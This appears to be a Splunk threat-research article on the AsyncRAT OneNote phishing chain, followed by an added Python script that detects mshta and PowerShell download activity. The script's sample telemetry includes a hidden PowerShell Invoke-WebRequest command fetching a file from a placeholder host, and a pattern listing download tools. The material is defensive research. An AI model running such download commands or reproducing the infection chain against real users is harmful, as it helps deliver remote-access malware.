AsyncRAT is a popular malware commodity and tool used by attackers and APT groups. In January 2019 AsyncRAT was released as an open source remote administration tool project on GitHub. Threat actors and adversaries have used several interesting script loaders and spear phishing attachments to deliver AsyncRAT to targeted hosts or networks in different campaigns. One prevalent campaign in the wild with this remote access trojan is the use of a Microsoft OneNote spear phishing attachment to load a .HTA file that downloads and runs an obfuscated batch script to execute the actual AsyncRAT code.

Of the many features of AsyncRAT, it encrypts its C2 communication protocol and contains several features via plugins, including:

AsyncRAT has also been in the weekly TOP 10 malware trends tracker on for the past few months.

Figure 1 shows a short summary of the infection chain of the OneNote campaigns that are discussed further in this article, including other interesting phishing campaigns that load different scripts to execute AsyncRAT.

Figure 1

In the following sections, we explore a recent OneNote campaign, show how to extract the AsyncRAT configuration, dive into common behaviors and review additional AsyncRAT script loaders.

Technical Analysis

OneNote Campaign

T1566.004 - Phishing: Spear Phishing Attachment

Malicious OneNote Attachment

The Splunk Threat Research Team (STRT) found several phishing email campaigns that contain malicious .one files. The malicious OneNote document will lure the targeted user to click through the warning to view the document, as seen in Figure 2. As soon as the user clicks, it will automatically load a malicious .HTA file to download the second stage of this infection chain.

Figure 2

T1218.005 - System Binary Proxy Execution: Mshta

The .one file is responsible for downloading a .HTA file, which uses the PowerShell cmdlet Invoke-WebRequest to download both the decoy .one file and the .bat script. The decoy .one file will act as a decoy document to hide the execution of the malicious .bat script that will decode the actual AsyncRAT malware.
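The OneNote -> mshta -> PowerShell Invoke-WebRequest chain described above is what a process-creation detection should key on. The following is an added example, not code from the Splunk post or its detection content; the event fields mimic Sysmon Event ID 1 and the sample events, paths and URL are constructed placeholders, not indicators from the campaign.

```python
"""Added example: flag the OneNote -> mshta -> PowerShell download chain
in process-creation telemetry. Field names follow Sysmon Event ID 1 loosely;
all sample values below are constructed and are not real IoCs."""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass
class ProcEvent:
    parent_image: str   # full path of the parent process image
    image: str          # full path of the created process image
    command_line: str   # command line of the created process


# Constructed sample telemetry (placeholder paths and an .invalid-TLD URL).
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE",
              r"C:\Windows\System32\mshta.exe",
              r'mshta.exe "C:\Users\user\AppData\Local\Temp\invoice.hta"'),
    ProcEvent(r"C:\Windows\System32\mshta.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell -w hidden Invoke-WebRequest http://example.invalid/d.one "
              "-OutFile d.one"),
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\notepad.exe",
              "notepad.exe notes.txt"),
]

# Invoke-WebRequest plus its Windows PowerShell 5.1 aliases (iwr, wget, curl).
_DOWNLOAD_CMDLET = re.compile(r"\b(invoke-webrequest|iwr|wget|curl)\b", re.IGNORECASE)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path, for parent/child matching."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(ev: ProcEvent) -> Optional[str]:
    """Return the matching rule name for one event, or None if it is benign."""
    parent, child = basename(ev.parent_image), basename(ev.image)
    if parent == "onenote.exe" and child == "mshta.exe":
        return "T1218.005 mshta spawned by OneNote"
    if (parent == "mshta.exe" and child in ("powershell.exe", "pwsh.exe")
            and _DOWNLOAD_CMDLET.search(ev.command_line)):
        return "PowerShell Invoke-WebRequest spawned by mshta"
    return None


def detect(events: List[ProcEvent]) -> List[Tuple[str, str]]:
    """Run every event through classify() and keep the hits with their command lines."""
    return [(rule, e.command_line) for e in events if (rule := classify(e))]
```

In production the same two parent/child conditions map directly onto a Sysmon or EDR process-creation search; tuning for OneNote's legitimate child processes is the main false-positive concern.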